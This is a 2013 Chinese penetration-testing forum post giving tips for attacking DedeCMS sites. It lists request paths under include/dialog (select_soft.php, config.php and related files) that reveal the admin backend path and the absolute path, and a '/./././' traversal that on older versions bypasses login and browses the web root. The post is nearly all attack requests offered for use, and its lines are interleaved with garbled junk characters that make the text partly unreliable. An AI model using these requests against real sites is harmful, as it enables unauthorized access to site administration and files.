找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms爆后台文件技巧
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2106|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理, J; r( ]- s( r, x
% t9 _! m/ ?7 V8 R# p4 V$ f% e7 K8 E
员帐号,新版本的就直接转向了后台.
2 K4 D8 r$ X& R2 A0 ^, t: J# q; V  z) {4 Y& [
2.include/dialog/config.php会爆出后台管理路径2 ^, ~2 F  Z. `

& U- {; M% `2 ~8 \7 T& `3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
  `9 q9 L, i" ^! M9 B* p% @4 Z! ^7 J
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径." c! p& w" D2 ]/ V; }1 N( }
/ M# F* ?5 v/ ~6 \# ^! k2 c5 g
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
6 E  K" f; F1 d
& m' J8 a) l" b% O3 [; Z! `. V2 }到根目录去.不过这些版本的访问地址有些不同.
- y7 G1 {7 g: |1 ]地址为require/dialog/select_soft.php?activepath=/././././././././
6 e1 _( J1 c; x5 n8 v' J5 m; V7 N5 A+ M6 y' S( G* l
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
  P! z" G' [4 O4 k) ^: a存在相同问题的文件还有( x" k  Q+ c$ e9 d
include\dialog\select_images.php
7 [7 f2 g, i2 C. E: ]% h0 tinclude\dialog\select_media.php  ], u, C/ {: m- a+ F7 a+ P
include\dialog\select_templets.php​
' Y# {4 v- k2 m- t' D* m, ?
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表